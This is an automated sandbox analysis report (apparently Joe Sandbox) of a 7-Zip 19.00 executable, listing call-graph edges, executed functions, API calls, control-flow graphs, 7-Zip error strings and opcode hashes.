28726->28727 28726->28752 28728 96a643 28727->28728 28728->28630 28729 943208 malloc _CxxThrowException 28729->28752 28730 96a648 28762 9694a8 7 API calls 28730->28762 28732 96a36f SysStringByteLen 28733 96a64d 28732->28733 28732->28752 28734 94ae2c VariantClear 28733->28734 28734->28730 28735 94ae2c VariantClear 28735->28752 28736 9694a8 7 API calls 28736->28752 28737 96a662 free free 28737->28730 28738 968928 malloc _CxxThrowException SysStringLen free VariantClear 28738->28752 28739 96a67d free free 28739->28730 28740 969d98 19 API calls 28740->28752 28741 96a698 free free 28741->28730 28742 969380 7 API calls 28742->28752 28743 9687a8 VariantClear 28743->28752 28744 96a6b0 free free free 28744->28730 28746 96a6d3 free free free 28746->28730 28748 968860 VariantClear 28748->28752 28749 96a6f6 free free free 28749->28730 28750 942130 2 API calls 28750->28752 28751 969af0 4 API calls 28751->28752 28752->28728 28752->28729 28752->28730 28752->28732 28752->28735 28752->28736 28752->28737 28752->28738 28752->28739 28752->28740 28752->28741 28752->28742 28752->28743 28752->28744 28752->28746 28752->28748 28752->28749 28752->28750 28752->28751 28753 94b8f0 4 API calls 28752->28753 28759 9698d4 malloc _CxxThrowException memmove 28752->28759 28760 96a034 8 API calls 28752->28760 28754 96a607 free free free 28753->28754 28761 9694a8 7 API calls 28754->28761 28756->28611 28757->28717 28758->28722 28760->28752 28768 947e41 28763->28768 28764 947e4a 28764->28768 28769 947a90 malloc _CxxThrowException free memmove FindNextFileW 28764->28769 28766 947978 39 API calls 28766->28768 28767 947e70 28767->28648 28768->28764 28768->28766 28768->28767 28769->28764 28771 969c22 28770->28771 28772 969bf5 28770->28772 28773 943208 2 API calls 28771->28773 28772->28771 28774 969c0d free free 28772->28774 28775 969c2f 28773->28775 28774->28772 28776 969c36 free 28775->28776 28784 969c45 28775->28784 28777 969d2f 28776->28777 28777->28657 28778 969ce8 28779 969d25 free 28778->28779 28780 942130 2 API calls 28778->28780 28779->28777 28781 969cfc 28780->28781 28783 969d16 28781->28783 28785 943314 3 API calls 28781->28785 28782 942130 2 API calls 28782->28784 28786 94b8f0 4 API calls 28783->28786 28784->28778 28784->28782 28787 943314 3 API calls 28784->28787 28789 94b8f0 4 API calls 28784->28789 28785->28783 28788 969d24 28786->28788 28787->28784 28788->28779 28789->28784 28791 968f9c 28790->28791 28795 968fa8 28790->28795 28792 942130 2 API calls 28791->28792 28792->28795 28793 96900a 28797 969078 28793->28797 28794 942130 2 API calls 28794->28795 28795->28793 28795->28794 28796 943314 malloc _CxxThrowException memmove 28795->28796 28796->28795 28798 9690b6 28797->28798 28802 9690c2 28797->28802 28799 942130 2 API calls 28798->28799 28799->28802 28800 96913f 28800->28336 28801 942130 2 API calls 28801->28802 28802->28800 28802->28801 28803 942130 2 API calls 28802->28803 28804 969110 memmove 28803->28804 28804->28802 28805->28369 28806->28369 28807 98ab29 28808 98abd1 28807->28808 28811 980524 SetConsoleCtrlHandler 28808->28811 28812 9742a2 28813 9742b8 28812->28813 28902 9640c4 28813->28902 28816 943404 4 API calls 28817 974370 28816->28817 28818 9743b1 28817->28818 28819 9745d8 28817->28819 28821 9746c5 free free 28818->28821 28822 9743b9 28818->28822 28820 943404 4 API calls 28819->28820 28823 97463b 28820->28823 28824 96419c 7 API calls 28821->28824 28905 96c684 28822->28905 28827 943404 4 API calls 28823->28827 28840 974519 28824->28840 28830 97464c 28827->28830 28828 9743dd 28831 942130 2 API calls 28828->28831 28829 974728 free free 28832 96419c 7 API calls 28829->28832 28833 943404 4 API calls 28830->28833 28834 9743e7 28831->28834 28832->28840 28835 97465d free free 28833->28835 28836 974401 28834->28836 28912 96caac malloc _CxxThrowException memmove 28834->28912 28837 96419c 7 API calls 28835->28837 28839 94b8f0 4 API calls 28836->28839 28837->28840 28841 974411 free free 28839->28841 28909 96419c 7 API calls 28841->28909 28845 974030 28846 974035 memmove 28845->28846 28847 974054 memmove 28845->28847 28848 974078 memmove 28846->28848 28847->28840 28847->28848 28849 974098 28848->28849 28875 96c0fc 28849->28875 28852 943404 4 API calls 28853 9740c2 28852->28853 28854 943404 4 API calls 28853->28854 28855 9740d3 28854->28855 28890 973d58 28855->28890 28857 9740ee 28858 97447d 28857->28858 28859 9740f8 28857->28859 28860 97450b 28858->28860 28864 943404 4 API calls 28858->28864 28861 942130 2 API calls 28859->28861 28863 96419c 7 API calls 28860->28863 28862 974102 28861->28862 28865 97411c 28862->28865 28911 96caac malloc _CxxThrowException memmove 28862->28911 28863->28840 28866 9744e9 28864->28866 28869 94b8f0 4 API calls 28865->28869 28868 943404 4 API calls 28866->28868 28870 9744fa 28868->28870 28872 97412c 28869->28872 28871 943404 4 API calls 28870->28871 28871->28860 28873 96419c 7 API calls 28872->28873 28874 97413a 28873->28874 28876 943208 2 API calls 28875->28876 28877 96c157 28876->28877 28878 943208 2 API calls 28877->28878 28879 96c161 28878->28879 28880 943208 2 API calls 28879->28880 28881 96c194 28880->28881 28882 943208 2 API calls 28881->28882 28883 96c19e 28882->28883 28884 943208 2 API calls 28883->28884 28885 96c1ab 28884->28885 28886 943208 2 API calls 28885->28886 28887 96c1b8 28886->28887 28888 943208 2 API calls 28887->28888 28889 96c1c5 28888->28889 28889->28852 28891 973d86 28890->28891 28892 973dc3 28890->28892 28893 942130 2 API calls 28891->28893 28894 942130 2 API calls 28892->28894 28895 973d8e 28892->28895 28893->28895 28896 973dd4 28894->28896 28895->28857 28897 943404 4 API calls 28896->28897 28898 973e15 28897->28898 28899 9491dc 51 API calls 28898->28899 28900 973e26 28899->28900 28900->28895 28901 973e2a GetLastError 28900->28901 28901->28895 28903 943208 2 API calls 28902->28903 28904 964140 memmove 28903->28904 28904->28816 28906 96c6dd 28905->28906 28907 94ae2c VariantClear 28906->28907 28908 96c72d 28907->28908 28908->28828 28908->28829 28910 964206 memmove 28909->28910 28910->28845 28911->28865 28912->28836 28913 973a42 28914 973c87 28913->28914 28915 973a4e 28913->28915 28915->28914 28951 96b2a0 VariantClear 28915->28951 28917 973ab7 28917->28914 28952 96b2a0 VariantClear 28917->28952 28919 973ad4 28919->28914 28953 96b2a0 VariantClear 28919->28953 28921 973af1 28921->28914 28954 96b2a0 VariantClear 28921->28954 28923 973b0e 28923->28914 28955 96b2a0 VariantClear 28923->28955 28925 973b2b 28925->28914 28956 96b2a0 VariantClear 28925->28956 28927 973b48 28927->28914 28928 94450c 3 API calls 28927->28928 28929 973b62 28928->28929 28930 943208 2 API calls 28929->28930 28932 973b6d 28930->28932 28931 973b97 28933 973c72 free free 28931->28933 28935 973bcd 28931->28935 28936 973c29 28931->28936 28932->28931 28934 94339c 4 API calls 28932->28934 28933->28914 28934->28931 28937 943208 2 API calls 28935->28937 28958 969190 CharUpperW CharUpperW 28936->28958 28939 973bd7 28937->28939 28941 943208 2 API calls 28939->28941 28940 973c36 28959 96005c 10 API calls 28940->28959 28943 973be4 28941->28943 28957 96005c 10 API calls 28943->28957 28944 973c5a 28945 943404 4 API calls 28944->28945 28947 973c66 free 28945->28947 28947->28933 28948 973bfa 28949 943404 4 API calls 28948->28949 28950 973c06 free free free 28949->28950 28950->28933 28951->28917 28952->28919 28953->28921 28954->28923 28955->28925 28956->28927 28957->28948 28958->28940 28959->28944 28960 951e0c 28961 951e30 28960->28961 28962 951e3f 28960->28962 28961->28962 28964 980a1c EnterCriticalSection 28961->28964 28965 980a60 LeaveCriticalSection 28964->28965 28966 980a53 28964->28966 28965->28962 28967 98b480 30 API calls 28966->28967 28967->28965 28968 98e1a6 28969 98e1bd __set_app_type 28968->28969 28970 98e201 28969->28970 28971 98e20a __setusermatherr 28970->28971 28972 98e217 _initterm __getmainargs _initterm 28970->28972 28971->28972 28973 98e291 28972->28973 28974 98e29b _cexit 28973->28974 28975 98e2a3 28973->28975 28974->28975

                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                Function 00988817 Relevance: 130.3, APIs: 62, Strings: 12, Instructions: 780COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: BufferConsoleExceptionHandleInfoScreenThrowfputs
                                                                                                                                                                                                • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$ $ || $7-Zip cannot find the code that works with archives.$Can't load module: $Codecs:$Formats:$Hashers:$KSNFMGOPBELH$Libs:$Unsupported archive type$offset=
                                                                                                                                                                                                • API String ID: 3442115484-272389550
                                                                                                                                                                                                • Opcode ID: afb9cc6d2aba557fd5c28d6c75725cc50b14ac0dfada8b8986538d3579b498c0
                                                                                                                                                                                                • Instruction ID: 79405079c9e79b672974ee0c1f76f96e818c2330cc2df3957d30808004fbe91f
                                                                                                                                                                                                • Opcode Fuzzy Hash: afb9cc6d2aba557fd5c28d6c75725cc50b14ac0dfada8b8986538d3579b498c0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C729F72314A8186DB74EF25E4A03AE7365F7C9BC0F809126DA9A47B69DF3CC449CB50
                                                                                                                                                                                                Function 009624C0 Relevance: 102.2, APIs: 81, Instructions: 981COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$ExceptionThrowmallocmemmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3352498445-0
                                                                                                                                                                                                • Opcode ID: a977c30e9b6c0c77fa91ba2bef927ebd8b73980ec7f1edacc1f00c6c713dab27
                                                                                                                                                                                                • Instruction ID: 49485bf80d41a89a114ff4615b4c8a06de4de6d00bc42aa62b126a89ae4e00d2
                                                                                                                                                                                                • Opcode Fuzzy Hash: a977c30e9b6c0c77fa91ba2bef927ebd8b73980ec7f1edacc1f00c6c713dab27
                                                                                                                                                                                                • Instruction Fuzzy Hash: 98828132218AC086CB34EF25E4907AEB364FBC9B94F548126EB9D57B59DF78C945CB00
                                                                                                                                                                                                Function 009647AC Relevance: 86.1, APIs: 56, Strings: 1, Instructions: 647COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 1635 9647ac-96485c call 943314 * 2 1640 96485e-964884 call 942880 1635->1640 1641 96489a-96491b call 966344 call 9432bc call 943b5c free * 2 call 943208 call 943314 1635->1641 1640->1641 1646 964886-964895 call 943404 1640->1646 1656 964921-964925 1641->1656 1657 9649bd-9649cb call 94477c 1641->1657 1646->1641 1656->1657 1659 96492b-96495e call 943208 call 94449c 1656->1659 1663 9649d1-9649e7 1657->1663 1664 964dff 1657->1664 1674 9649b0-9649b8 free 1659->1674 1675 964960-96496f 1659->1675 1671 964a68-964ad2 call 943208 * 3 1663->1671 1672 9649e9-964a28 free * 4 1663->1672 1665 964e02-964e05 1664->1665 1668 964e07-964e1c call 942130 1665->1668 1669 964e40-964e45 1665->1669 1688 964e30 1668->1688 1689 964e1e-964e2e call 943314 1668->1689 1676 964e47-964e58 call 943518 1669->1676 1677 964e5d-964e62 call 9470c8 1669->1677 1721 964d30-964d3b 1671->1721 1722 964ad8-964adb 1671->1722 1679 964a2a 1672->1679 1680 964a58-964a63 free 1672->1680 1674->1657 1682 964971-964978 1675->1682 1683 96497a-96498b 1675->1683 1695 964f2c-964f98 call 953f0c 1676->1695 1686 964e67-964e6a 1677->1686 1687 964a2e-964a41 1679->1687 1691 96504a-965059 free 1680->1691 1682->1683 1690 964993-964996 1682->1690 1683->1690 1694 964e70-964eea GetLastError call 943518 call 94362c free * 4 1686->1694 1686->1695 1696 964a54-964a56 1687->1696 1697 964a43-964a4f free * 2 1687->1697 1700 964e33-964e3b call 94b8f0 1688->1700 1689->1700 1690->1674 1699 964998-9649ad call 943404 1690->1699 1701 96523b-96524e 1691->1701 1728 964eec 1694->1728 1729 964f1a-964f27 free 1694->1729 1715 96505e-965062 1695->1715 1716 964f9e-964fa2 1695->1716 1696->1680 1696->1687 1697->1696 1699->1674 1700->1669 1719 965064-96506c 1715->1719 1720 96506e 1715->1720 1716->1715 1717 964fa8-964fac 1716->1717 1717->1715 1725 964fb2-964fc7 call 9532e8 1717->1725 1719->1720 1730 965071-96507d 1719->1730 1720->1730 1726 964df0-964dfd call 952a84 1721->1726 1727 964d41-964dae call 952a84 free * 4 1721->1727 1723 964b24-964b3e call 96ec5c 1722->1723 1724 964add-964ae0 1722->1724 1750 964b44 1723->1750 1751 964c9d-964cee call 952a84 free * 4 1723->1751 1724->1723 1731 964ae2-964aee 1724->1731 1725->1715 1749 964fcd-96500d free * 4 1725->1749 1726->1665 1794 964db0 1727->1794 1795 964dde-964deb free 1727->1795 1734 964ef0-964f03 1728->1734 1729->1691 1736 965152-96516d 1730->1736 1737 965083-9650d1 1730->1737 1738 964af0-964af7 1731->1738 1739 964b4c-964b50 1731->1739 1743 964f15-964f18 1734->1743 1744 964f05-964f10 free * 2 1734->1744 1748 965173 1736->1748 1775 965143-965150 call 94ae2c 1737->1775 1776 9650d3-9650de 1737->1776 1738->1739 1747 964af9-964b14 call 96b290 1738->1747 1752 964b52-964b5a 1739->1752 1753 964b60-964b63 1739->1753 1743->1729 1743->1734 1744->1743 1777 964c0a-964c5b call 952a84 free * 4 1747->1777 1778 964b1a-964b22 1747->1778 1755 965175-96517b 1748->1755 1756 96500f 1749->1756 1757 96503d-965048 free 1749->1757 1750->1739 1784 964cf0 1751->1784 1785 964d1e-964d2b free 1751->1785 1752->1753 1760 964bf5-964bff 1752->1760 1761 964b65-964b80 call 944318 1753->1761 1762 964bc1-964bc4 1753->1762 1765 965190-96519e call 981850 1755->1765 1766 96517d-965188 call 956cd0 1755->1766 1767 965013-965026 1756->1767 1757->1691 1760->1722 1772 964c05 1760->1772 1791 964b87-964b9e 1761->1791 1792 964b82-964b85 1761->1792 1769 964bc6-964be1 call 9543fc 1762->1769 1770 964be3-964bf2 call 98c7d4 1762->1770 1789 9651a1-9651a6 1765->1789 1766->1765 1780 965038-96503b 1767->1780 1781 965028-965033 free * 2 1767->1781 1769->1760 1769->1770 1770->1760 1772->1721 1775->1755 1776->1775 1793 9650e0-9650e3 1776->1793 1810 964c5d 1777->1810 1811 964c8b-964c98 free 1777->1811 1778->1739 1780->1757 1780->1767 1781->1780 1790 964cf4-964d07 1784->1790 1785->1691 1806 9651b1-9651f1 free * 4 1789->1806 1807 9651a8-9651b0 call 956cd0 1789->1807 1808 964d19-964d1c 1790->1808 1809 964d09-964d14 free * 2 1790->1809 1801 964ba0-964ba8 1791->1801 1802 964baf-964bb3 1791->1802 1792->1762 1803 9650e5-9650e7 1793->1803 1804 965138-965140 1793->1804 1805 964db4-964dc7 1794->1805 1795->1691 1801->1762 1815 964baa-964bad 1801->1815 1802->1762 1816 964bb5-964bbd 1802->1816 1817 96512b-965136 1803->1817 1818 9650e9-9650eb 1803->1818 1804->1775 1819 964dd9-964ddc 1805->1819 1820 964dc9-964dd4 free * 2 1805->1820 1813 9651f3 1806->1813 1814 965221-965239 free * 2 1806->1814 1807->1806 1808->1785 1808->1790 1809->1808 1822 964c61-964c74 1810->1822 1811->1691 1821 9651f7-96520a 1813->1821 1814->1701 1815->1762 1816->1762 1817->1775 1823 96511f-965129 1818->1823 1824 9650ed-9650f0 1818->1824 1819->1795 1819->1805 1820->1819 1828 96521c-96521f 1821->1828 1829 96520c-965217 free * 2 1821->1829 1826 964c86-964c89 1822->1826 1827 964c76-964c81 free * 2 1822->1827 1823->1775 1830 965112-96511d 1824->1830 1831 9650f2-965111 _CxxThrowException 1824->1831 1826->1811 1826->1822 1827->1826 1828->1814 1828->1821 1829->1828 1830->1775 1831->1830
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Can not create output directory: , xrefs: 00964E83
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove$ErrorExceptionLastThrow
                                                                                                                                                                                                • String ID: Can not create output directory:
                                                                                                                                                                                                • API String ID: 4159955631-3123869724
                                                                                                                                                                                                • Opcode ID: 342012ea8a5d9de563d8076d0ff135b9a41e5e317faebfc52beceac274ff6334
                                                                                                                                                                                                • Instruction ID: f349778687ed9d4147876c7a42facd5f4e2e28d692f9aa19fa84cd9086b80043
                                                                                                                                                                                                • Opcode Fuzzy Hash: 342012ea8a5d9de563d8076d0ff135b9a41e5e317faebfc52beceac274ff6334
                                                                                                                                                                                                • Instruction Fuzzy Hash: 47428332219AC096CA34EF75E8907AEB361F7CAB80F945112EB9D47B59DF38C955CB00
                                                                                                                                                                                                Function 00965458 Relevance: 74.2, APIs: 47, Strings: 2, Instructions: 702COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 2037 965458-9654e2 2038 9654e4-9654f0 2037->2038 2039 9654f2-9654f6 2037->2039 2040 9654fe-965504 2038->2040 2039->2040 2041 9655ec-9655fd 2040->2041 2042 96550a 2040->2042 2044 965612-965615 2041->2044 2045 9655ff-96560a call 942130 2041->2045 2043 96550d-965538 call 947d28 call 943208 2042->2043 2058 96556c-96559c call 94b8f0 free 2043->2058 2059 96553a-96554c call 947ebc 2043->2059 2047 965617-96561f memset 2044->2047 2048 965624-965639 call 942130 2044->2048 2045->2044 2047->2048 2056 96563b-96563e call 953524 2048->2056 2057 965648 2048->2057 2064 965643-965646 2056->2064 2061 96564b-965656 2057->2061 2058->2043 2073 9655a2 2058->2073 2068 965551-965554 2059->2068 2065 965662-9656d1 call 9643b0 2061->2065 2066 965658-965661 2061->2066 2064->2061 2075 9656d3-9656e3 2065->2075 2076 9656fd-965715 2065->2076 2066->2065 2071 965556-965562 2068->2071 2072 9655a4-9655c7 _CxxThrowException 2068->2072 2077 965564 2071->2077 2078 9655c8-9655eb _CxxThrowException 2071->2078 2072->2078 2073->2041 2075->2076 2086 9656e5-9656f8 free 2075->2086 2079 965f1d-965f22 2076->2079 2080 96571b-96571e 2076->2080 2077->2058 2078->2041 2081 965f24-965f27 2079->2081 2082 965f29-965f3d 2079->2082 2084 965726-96572a 2080->2084 2081->2082 2085 965f8d-966002 free * 2 2081->2085 2093 965f54-965f67 2082->2093 2094 965f3f-965f52 free 2082->2094 2087 965c37-965c50 2084->2087 2088 965730-96575f call 947d28 call 943208 2084->2088 2097 966004-966017 2085->2097 2098 965f7c-965f8b free 2086->2098 2087->2084 2089 965c56-965c5a 2087->2089 2103 965772-96577e call 947ebc 2088->2103 2104 965761-965770 2088->2104 2089->2079 2093->2085 2105 965f69-965f7b free 2093->2105 2094->2098 2098->2097 2108 965783-965786 2103->2108 2106 96579e-9657b4 call 981544 2104->2106 2105->2098 2113 965c5f-965c80 free * 2 2106->2113 2114 9657ba-96586c call 964504 call 9642a8 call 9640c4 call 943404 call 974c00 2106->2114 2110 96578c-965798 2108->2110 2111 965ef9-965f1c _CxxThrowException 2108->2111 2110->2106 2110->2111 2111->2079 2113->2098 2126 96586e-965876 2114->2126 2127 96587d-965883 2114->2127 2128 965878 2126->2128 2129 965889-9658b3 call 981bc0 2126->2129 2127->2129 2130 965c85-965c9e free 2127->2130 2128->2127 2136 965d02-965d1e free 2129->2136 2137 9658b9-9658bc 2129->2137 2131 965ca0 2130->2131 2132 965cbe-965cfd free call 964610 free * 2 2130->2132 2134 965ca4-965cbc free 2131->2134 2132->2098 2134->2132 2134->2134 2141 965d20 2136->2141 2142 965d3e-965d7b free call 964610 free * 2 2136->2142 2139 9658c2-9658d3 2137->2139 2140 9659b1-9659bd 2137->2140 2145 9658d5-965907 call 947d28 call 943208 call 947ebc 2139->2145 2146 965933 2139->2146 2147 9659c3-9659cd 2140->2147 2148 965a8e-965a93 2140->2148 2143 965d24-965d3c free 2141->2143 2142->2098 2143->2142 2143->2143 2187 965924-965931 free 2145->2187 2188 965909-965915 2145->2188 2151 965936-96594f free 2146->2151 2154 965a95-965a9a 2147->2154 2155 9659d3-9659e1 2147->2155 2153 965aa1-965ab9 2148->2153 2158 965951 2151->2158 2159 96596f-9659ac free call 964610 free 2151->2159 2156 965acc 2153->2156 2157 965abb-965ac3 2153->2157 2154->2153 2161 965a55-965a58 2155->2161 2162 9659e3-9659ed 2155->2162 2165 965acf-965b54 call 9647ac 2156->2165 2157->2156 2164 965ac5-965aca 2157->2164 2167 965955-96596d free 2158->2167 2159->2087 2168 965a9c 2161->2168 2169 965a5a-965a86 2161->2169 2163 9659f5-965a11 call 964434 2162->2163 2181 965a13-965a15 2163->2181 2182 965a21-965a30 2163->2182 2164->2165 2183 965dfe-965e1a free 2165->2183 2184 965b5a-965b61 2165->2184 2167->2159 2167->2167 2168->2153 2185 965d80-965d9c free 2169->2185 2186 965a8c 2169->2186 2181->2182 2189 965a17-965a1d 2181->2189 2182->2163 2190 965a32-965a52 2182->2190 2195 965e1c 2183->2195 2196 965e3a-965e77 free call 964610 free * 2 2183->2196 2191 965b63-965b7e 2184->2191 2192 965b80 2184->2192 2193 965d9e 2185->2193 2194 965dbc-965df9 free call 964610 free * 2 2185->2194 2186->2153 2187->2151 2188->2187 2199 965917-96591f 2188->2199 2189->2182 2190->2161 2200 965b88-965bb6 2191->2200 2192->2200 2201 965da2-965dba free 2193->2201 2194->2098 2197 965e20-965e38 free 2195->2197 2196->2098 2197->2196 2197->2197 2199->2187 2204 965e7c-965e95 free 2200->2204 2205 965bbc-965bd6 free 2200->2205 2201->2194 2201->2201 2207 965e97 2204->2207 2208 965eb5-965ef4 free call 964610 free * 2 2204->2208 2209 965bff-965c12 free call 964610 2205->2209 2210 965bd8-965bdc 2205->2210 2212 965e9b-965eb3 free 2207->2212 2208->2098 2217 965c17-965c35 free 2209->2217 2214 965bde-965bf5 free 2210->2214 2212->2208 2212->2212 2214->2214 2219 965bf7 2214->2219 2217->2087 2219->2209
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$ExceptionThrow$memset
                                                                                                                                                                                                • String ID: can't decompress folder$there is no such archive
                                                                                                                                                                                                • API String ID: 4182836161-2069749860
                                                                                                                                                                                                • Opcode ID: ce4216a456ecfb562eed58e09bd1e089566f6c8440c9455ca6f18eb35ebed729
                                                                                                                                                                                                • Instruction ID: ba55bddeb8f80938a5540e633391ccca1b9d9d0c37ddc996d1c1bad7ec250554
                                                                                                                                                                                                • Opcode Fuzzy Hash: ce4216a456ecfb562eed58e09bd1e089566f6c8440c9455ca6f18eb35ebed729
                                                                                                                                                                                                • Instruction Fuzzy Hash: CB525D33209AC186CA24DF25E4947AEB764F7CAB90F455112EF9E53B29DF38C895CB40
                                                                                                                                                                                                Function 0096F13E Relevance: 59.4, APIs: 47, Instructions: 683COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: c9d507f69cf5efe20d4de7e75527924661c2f100977259353f40b5d9e0ced28d
                                                                                                                                                                                                • Instruction ID: 1de3930fc2c3307e66bfe80d68b6d0cbb469b88265f35aad02a133c08298a1d6
                                                                                                                                                                                                • Opcode Fuzzy Hash: c9d507f69cf5efe20d4de7e75527924661c2f100977259353f40b5d9e0ced28d
                                                                                                                                                                                                • Instruction Fuzzy Hash: B0427F3720AAC086CB24DF25E0A0BAE7BA5F7CAB88F555465EB5E47B15CF39C485C700
                                                                                                                                                                                                Function 00950DCC Relevance: 51.4, APIs: 17, Strings: 12, Instructions: 652COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • -ai switch is not supported for this command, xrefs: 009515C3
                                                                                                                                                                                                • Unsupported command:, xrefs: 00950E57
                                                                                                                                                                                                • stdout mode and email mode cannot be combined, xrefs: 00951710
                                                                                                                                                                                                • The command must be specified, xrefs: 00950DF5
                                                                                                                                                                                                • Unsupported -spf:, xrefs: 00950F7E
                                                                                                                                                                                                • Archive name cannot by empty, xrefs: 00951151
                                                                                                                                                                                                • Cannot use absolute pathnames for this command, xrefs: 0095138C
                                                                                                                                                                                                • Only one archive can be created with rename command, xrefs: 009517E1
                                                                                                                                                                                                • Incorrect Number of benmchmark iterations, xrefs: 00951847
                                                                                                                                                                                                • Cannot find archive name, xrefs: 0095110A
                                                                                                                                                                                                • I won't write data and program's messages to same stream, xrefs: 009514B3, 00951782
                                                                                                                                                                                                • I won't write compressed data to a terminal, xrefs: 00951741
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
